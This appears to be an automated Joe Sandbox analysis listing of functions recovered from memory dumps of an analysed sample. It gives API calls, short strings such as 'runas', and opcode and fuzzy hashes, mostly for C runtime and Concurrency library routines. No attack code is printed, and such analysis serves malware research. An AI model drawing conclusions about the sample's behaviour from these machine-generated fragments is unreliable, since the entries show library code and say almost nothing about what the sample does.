Function 0043335E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00433378
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0043338C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 004333A4
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004333BC

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 0d4eeafebd1152bad2d49cec287f48e4063e6d3d3fbacd785b2672593b8aca98
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: FD012632700214A7CF11AE66C801AEF77A99F58355F00505BFC12AB291CE74EE1192A9

Function 021435C5 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 021435DF
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021435F3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 0214360B
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 02143623

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 4d3a797eeabca572f949f6eaa5a9d4dad014a087ddffa828bac36febcf757d42
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: FE01D632644115BBCF16AE548841AEFB7AA9F44750F200095ED29AB381DF31EE10CAE0

Function 0043B67C Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,0043B7E1,00000000,?,00441EDB,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0043B692
GetLastError.KERNEL32(?,00441EDB,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B7E1,00000000,00000104,?), ref: 0043B69C
__dosmaperr.LIBCMT ref: 0043B6A3

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 8c712ef905e87c6c51826a754d30d3c8f5a37e36d861da8713e947d665e60d92
Instruction ID: 51d80bb2ca8f9ca894582dd997afb900ed82d480c72698335ac4aa0048ef4d82
Opcode Fuzzy Hash: 8c712ef905e87c6c51826a754d30d3c8f5a37e36d861da8713e947d665e60d92
Instruction Fuzzy Hash: D1F08132600515BB8B211FA2EC09A5BFF6DFF483A0B009526F619C7121D739EC51CBEA

Function 0043B6E5 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,0043B7E1,00000000,?,00441E66,00000000,00000000,0043B7E1,?,?,00000000,00000000,00000001), ref: 0043B6FB
GetLastError.KERNEL32(?,00441E66,00000000,00000000,0043B7E1,?,?,00000000,00000000,00000001,00000000,00000000,?,0043B7E1,00000000,00000104), ref: 0043B705
__dosmaperr.LIBCMT ref: 0043B70C

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 9ccbf7d7be1dffaf1e6fa39039e71422e04689a6062b1f6a11bc04b02d8cf16a
Instruction ID: 4fe900c6a6a10ab9e8d4be9abbee83232b953685f6f7baef41a50900c16b3573
Opcode Fuzzy Hash: 9ccbf7d7be1dffaf1e6fa39039e71422e04689a6062b1f6a11bc04b02d8cf16a
Instruction Fuzzy Hash: FFF08635200615BB8B211FA2DC08E5BBF69FF883A1B109126F618C7220D739E811CBD4

Function 0214B8E3 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,0214BA48,00000000,?,02152142,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 0214B8F9
GetLastError.KERNEL32(?,02152142,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,0214BA48,00000000,00000104,?), ref: 0214B903
__dosmaperr.LIBCMT ref: 0214B90A

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 8c712ef905e87c6c51826a754d30d3c8f5a37e36d861da8713e947d665e60d92
Instruction ID: d0607b97650ea1fc673f6a5c195f857dad11566bc6062e1a6228e2a8b76e995c
Opcode Fuzzy Hash: 8c712ef905e87c6c51826a754d30d3c8f5a37e36d861da8713e947d665e60d92
Instruction Fuzzy Hash: CEF06DB6A48515BB9B211FB2DC08A5AFF6AFF443A57058525F42CC7020DB31E611CBD0

Function 0214B94C Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,0214BA48,00000000,?,021520CD,00000000,00000000,0214BA48,?,?,00000000,00000000,00000001), ref: 0214B962
GetLastError.KERNEL32(?,021520CD,00000000,00000000,0214BA48,?,?,00000000,00000000,00000001,00000000,00000000,?,0214BA48,00000000,00000104), ref: 0214B96C
__dosmaperr.LIBCMT ref: 0214B973

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 9ccbf7d7be1dffaf1e6fa39039e71422e04689a6062b1f6a11bc04b02d8cf16a
Instruction ID: 31ca2d44a5f7ab17a025f75901aa003b19d2e9fc23fdda5e90e42b0b7d61fea4
Opcode Fuzzy Hash: 9ccbf7d7be1dffaf1e6fa39039e71422e04689a6062b1f6a11bc04b02d8cf16a
Instruction Fuzzy Hash: 3FF04672A44615BB8A211FA6DC08A5AFF6AFF487A57058921B52CC6120DB31E921CBE0

Function 00424FA5 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041FF06: TlsGetValue.KERNEL32(?,?,0041F487,0041F2B4,?,?), ref: 0041FF0C

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 00424FCF

Part of subcall function 0042E2AE: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042E2D5
Part of subcall function 0042E2AE: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042E2EE
Part of subcall function 0042E2AE: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E364
Part of subcall function 0042E2AE: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042E36C

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00424FDD
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00424FE7
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00424FF1

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: 68e8ff0b8797b904982112fcdd5956e8882ad8697d32738a6b71a93e59230761
Instruction ID: b0d46b402f3d008e4ba780882897f80fbb5b0ea3cf7b1ba0ee7c8c5be0d58504
Opcode Fuzzy Hash: 68e8ff0b8797b904982112fcdd5956e8882ad8697d32738a6b71a93e59230761
Instruction Fuzzy Hash: 1FF0F63170053467CB25B727A81286EB7699FC1714B85002FF81153291EF7CDE5587DD

Function 0213520C Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0213016D: TlsGetValue.KERNEL32(?,?,0212F6EE,0212F51B,?,?), ref: 02130173

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02135236

Part of subcall function 0213E515: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0213E53C
Part of subcall function 0213E515: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0213E555
Part of subcall function 0213E515: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0213E5CB
Part of subcall function 0213E515: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0213E5D3

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02135244
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 0213524E
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02135258

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: 68e8ff0b8797b904982112fcdd5956e8882ad8697d32738a6b71a93e59230761
Instruction ID: d020cccaecea7623611bf3ec3fc13c033adc9232523e96eae9435473cd06fbea
Opcode Fuzzy Hash: 68e8ff0b8797b904982112fcdd5956e8882ad8697d32738a6b71a93e59230761
Instruction Fuzzy Hash: 35F02B71A80618BFCB27B7258800A6EFB67AF85F64B940069E81153280DFB4DA018FC1

Function 0212C80B Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0212FB18
Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0212FB4B
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0212FB57
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0212FB60

Part of subcall function 0212F4F4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0212F516
Part of subcall function 0212F4F4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0212F537

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Concurrency::critical_section::_Timer$Acquire_lockAsyncBase::ContextCurrentDerefH_prolog3LibraryLoadLockNodeNode::QueueRegisterSchedulerSwitch_to_active
String ID:
API String ID: 2559503089-0
Opcode ID: b0ac12cebaf670ec5d334eee81d78a1e3c4e67a3a848c3f0357541783c11b06e
Instruction ID: 0063761f859179a06df3c671cda53ca9705a8d84a67e5cab720b17ffc19f7c29
Opcode Fuzzy Hash: b0ac12cebaf670ec5d334eee81d78a1e3c4e67a3a848c3f0357541783c11b06e
Instruction Fuzzy Hash: ACF024306C02386F9F28BE74986497EB2AB9B41324F180129B5126B780DF708D2B8A90

Function 004294B0 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 004294B9

Part of subcall function 0041F46B: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425426

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 004294DD
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 004294F0
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 004294F9

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction ID: b196535bcbd10f4bb0c799195e9ee3f9e604c4a1e8b141619296e83f5603a994
Opcode Fuzzy Hash: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction Fuzzy Hash: 2EF0A030304E304FE631BA69A811F6B23D89F44B19F40841FE85AC6682CA6CFC43CB49

Function 004469FF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00408610,0000000F,0045FB78,00000000,00408610,?,004450EB,00408610,00000001,00408610,00408610,?,0043FFC4,00000000,?,00408610), ref: 00446A16
GetLastError.KERNEL32(?,004450EB,00408610,00000001,00408610,00408610,?,0043FFC4,00000000,?,00408610,00000000,00408610,?,00440518,00408610), ref: 00446A22

Part of subcall function 004469E8: CloseHandle.KERNEL32(FFFFFFFE,00446A32,?,004450EB,00408610,00000001,00408610,00408610,?,0043FFC4,00000000,?,00408610,00000000,00408610), ref: 004469F8

___initconout.LIBCMT ref: 00446A32

Part of subcall function 004469AA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004469D9,004450D8,00408610,?,0043FFC4,00000000,?,00408610,00000000), ref: 004469BD

WriteConsoleW.KERNEL32(00408610,0000000F,0045FB78,00000000,?,004450EB,00408610,00000001,00408610,00408610,?,0043FFC4,00000000,?,00408610,00000000), ref: 00446A47

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction ID: eb101eafd28bdb580c54fcbc0025a6c2856bea8722c135a9e5857212bf2778cf
Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction Fuzzy Hash: 59F06536101654BBDF621FE5EC09A8A3F26FF4A3A1F019022FE1C95131D672DC20DB9A

Function 02156C66 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(02118877,0000000F,0045FB78,00000000,02118877,?,02155352,02118877,00000001,02118877,02118877,?,0215022B,00000000,?,02118877), ref: 02156C7D
GetLastError.KERNEL32(?,02155352,02118877,00000001,02118877,02118877,?,0215022B,00000000,?,02118877,00000000,02118877,?,0215077F,02118877), ref: 02156C89

Part of subcall function 02156C4F: CloseHandle.KERNEL32(00462970,02156C99,?,02155352,02118877,00000001,02118877,02118877,?,0215022B,00000000,?,02118877,00000000,02118877), ref: 02156C5F

___initconout.LIBCMT ref: 02156C99

Part of subcall function 02156C11: CreateFileW.KERNEL32(00457658,40000000,00000003,00000000,00000003,00000000,00000000,02156C40,0215533F,02118877,?,0215022B,00000000,?,02118877,00000000), ref: 02156C24

WriteConsoleW.KERNEL32(02118877,0000000F,0045FB78,00000000,?,02155352,02118877,00000001,02118877,02118877,?,0215022B,00000000,?,02118877,00000000), ref: 02156CAE

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction ID: 15dd750ecf865ea7521571a6c2a5ceb5872fc5f0f91626d2947db2a9a0991fbf
Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
Instruction Fuzzy Hash: 62F01C36141268FBCF625FA5EC08A893F2AEB483A2F404061FE2C95130D772C860EBD5

Function 0041D13B Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,0041D0D8,00000064), ref: 0041D15E
LeaveCriticalSection.KERNEL32(00465720,00468650,?,0041D0D8,00000064,?,76230F00,?,004074FD,00468650), ref: 0041D168
WaitForSingleObjectEx.KERNEL32(00468650,00000000,?,0041D0D8,00000064,?,76230F00,?,004074FD,00468650), ref: 0041D179
EnterCriticalSection.KERNEL32(00465720,?,0041D0D8,00000064,?,76230F00,?,004074FD,00468650), ref: 0041D180

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
Instruction ID: d0a0887b86694dcdc654fd0292c9f1f8850644ce887d3e4a2860930c159fcbbb
Opcode Fuzzy Hash: 14bf3a9d4be9bf837093a7814f6444b67149b9ba994a1b02bf3174ea719e34b8
Instruction Fuzzy Hash: F0E01235941B24F7CB112B50EC48A8E3F29EB09753F144032F90596161D7A55C419BDF

Function 02117927 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 02117BF0

Strings

runas, xrefs: 0211747A

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: runas
API String ID: 3472027048-4000483414
Opcode ID: 7c7bb8e5305ff4923c0f45b9453b115b08ebd54b08192de8eff7d9096025f458
Instruction ID: 589c19129a3886d186fbc9b44df751c0fb76acc1e35b43a214b9a42dcf2c0f35
Opcode Fuzzy Hash: 7c7bb8e5305ff4923c0f45b9453b115b08ebd54b08192de8eff7d9096025f458
Instruction Fuzzy Hash: 16E15B71A40248AFEB08EB78DD4579DBB72DF41318F20826CF405AB3C1DB799A558B92

Function 0043E5F4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 0043E189: GetOEMCP.KERNEL32(00000000,0043E3FB,?,?,0043751E,0043751E,?), ref: 0043E1B4

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0043E442,?,00000000,?,?,?,?,?,?,0043751E), ref: 0043E652
GetCPInfo.KERNEL32(00000000,BC,?,?,0043E442,?,00000000,?,?,?,?,?,?,0043751E,?), ref: 0043E694

Strings

BC, xrefs: 0043E68F, 0043E692

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: BC
API String ID: 546120528-447861928
Opcode ID: 8ecca21949df1998ef528f5ae77256f2a90672f43a3fcedec22111c7d97b8024
Instruction ID: eaa448b68eac6edf95ba47836c9976a4c4254416396ed1bc20bfc28285d70f8d
Opcode Fuzzy Hash: 8ecca21949df1998ef528f5ae77256f2a90672f43a3fcedec22111c7d97b8024
Instruction Fuzzy Hash: 26512230A013059EEB208F77C8416ABBBF5AF59304F14616FD0968B3D2E77D95428B99

Function 00445260 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00000002,?,00000000,?,00000000,?), ref: 0044533E

Strings

ZYD, xrefs: 004452EC, 004453FA
ZYD, xrefs: 00445294

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: ZYD$ZYD
API String ID: 2738559852-3364372138
Opcode ID: 9ed8e8491749e4f9fa1be0f5be92a269c69ff53bd05af070b8d8d90711fa4ee6
Instruction ID: dd1879068eeb6e7039d9b1fc0dd93a614c8df771ee689368d459ebb1f2f03301
Opcode Fuzzy Hash: 9ed8e8491749e4f9fa1be0f5be92a269c69ff53bd05af070b8d8d90711fa4ee6
Instruction Fuzzy Hash: 9051F831A04656EBDF10CF58D481BEDB7B0FF19350F20415BD855AB392E3785981CB99

Function 004179A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMONLIBRARYCODE

Download Yara Rule

APIs

__Cnd_destroy_in_situ.LIBCPMT ref: 00417A98
__Mtx_destroy_in_situ.LIBCPMT ref: 00417AA1

Strings

pzA, xrefs: 00417A7A

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situMtx_destroy_in_situ
String ID: pzA
API String ID: 1432671424-2142982456
Opcode ID: cc396f9853cff5f8307324f91405c3b12d26305c73c143b09105fe9d4bfd1ca7
Instruction ID: 1cfa6ef953916404246279cdc2a0d33fdadd2878421757fb5b444b87b67af309
Opcode Fuzzy Hash: cc396f9853cff5f8307324f91405c3b12d26305c73c143b09105fe9d4bfd1ca7
Instruction Fuzzy Hash: 8F31E2B1A043049BD720DF68D945A9BB7F8EF14354F000A2FEA45C7241E779EA9483E5

Function 02144A47 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 02144A86
__IsNonwritableInCurrentImage.LIBCMT ref: 02144B3A

Strings

csm, xrefs: 02144B24

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 6d031ba505c9ec8e722e9c4453558d7d4a8e6396e40e733c41e229fa6cb4f40d
Instruction ID: 079a2fc16fdf315bd4c913b4fa2164912a4c7d80076d61d9c6355527a1c31e15
Opcode Fuzzy Hash: 6d031ba505c9ec8e722e9c4453558d7d4a8e6396e40e733c41e229fa6cb4f40d
Instruction Fuzzy Hash: 0C41D438A40208AFCF10DF68C884B9EBBA6AF45318F148196EC1D9B391DB71DA01CF91

Function 0214E647 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 0214E3F0: GetOEMCP.KERNEL32(00000000,0214E662,?,?,02147785,02147785,?), ref: 0214E41B

_free.LIBCMT ref: 0214E6BF

Strings

@"F, xrefs: 0214E6E7

Memory Dump Source

Source File: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2110000_3plugin29563.jbxd

Yara matches

Similarity

API ID: _free
String ID: @"F
API String ID: 269201875-3084318295
Opcode ID: 8b0a6106cb1ee21935c2e95d3b856d5b1c89e5012ee23919a3339f3b95d7c5b1
Instruction ID: 0006d18095082489cf6f076bcd05902fca924072a7939f269f3ab352b3d65e04
Opcode Fuzzy Hash: 8b0a6106cb1ee21935c2e95d3b856d5b1c89e5012ee23919a3339f3b95d7c5b1
Instruction Fuzzy Hash: 3E31B272940259AFCF11DF68D840B9E77E5FF40324F110169E9189B2A1EF719951CF91

Function 00403930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__Mtx_init_in_situ.LIBCPMT ref: 00403962
__Mtx_init_in_situ.LIBCPMT ref: 004039A1

Strings

pB@, xrefs: 00403940

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: Mtx_init_in_situ
String ID: pB@
API String ID: 3366076730-522444117
Opcode ID: 21f11e208d3effdb0d2858b9f5ffce26a307cc41c34ba9361bac88ef1efef47f
Instruction ID: 2d3549354d2d87e705cea20ec78e304087769866733b3590a1178bdd03939b5b
Opcode Fuzzy Hash: 21f11e208d3effdb0d2858b9f5ffce26a307cc41c34ba9361bac88ef1efef47f
Instruction Fuzzy Hash: BD4126B06017059FD720CF29C98875ABBF4FF44315F10861EE86A9B381E778A905CF80

Function 0041B576 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0041B5FE
RaiseException.KERNEL32(?,?,?,?), ref: 0041B623

Part of subcall function 00433AA1: RaiseException.KERNEL32(E06D7363,00000001,00000003,0045E408,?,?,?,0045E408), ref: 00433B01

Part of subcall function 00438B1F: IsProcessorFeaturePresent.KERNEL32(00000017,0043A65D,?,?,004368EA,?,?,?,?,0043751E,?), ref: 00438B3B

Strings

csm, xrefs: 0041B5B2

Memory Dump Source

Source File: 00000000.00000002.2285882842.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2285882842.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3plugin29563.jbxd

Yara matches

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: 037ecd330ff057ccde2924b98a7087a3806656c644379350219f2c3e850ed4f5
Instruction ID: feae8b73edc9324915a1f6e22f3e9b17a67ed849f83200170914959a456079f3
Opcode Fuzzy Hash: 037ecd330ff057ccde2924b98a7087a3806656c644379350219f2c3e850ed4f5
Instruction Fuzzy Hash: 4921BD31D00218ABCF24DF95D941AEEB3B5EF14318F54001EE409AB250DB38AD86CBCA

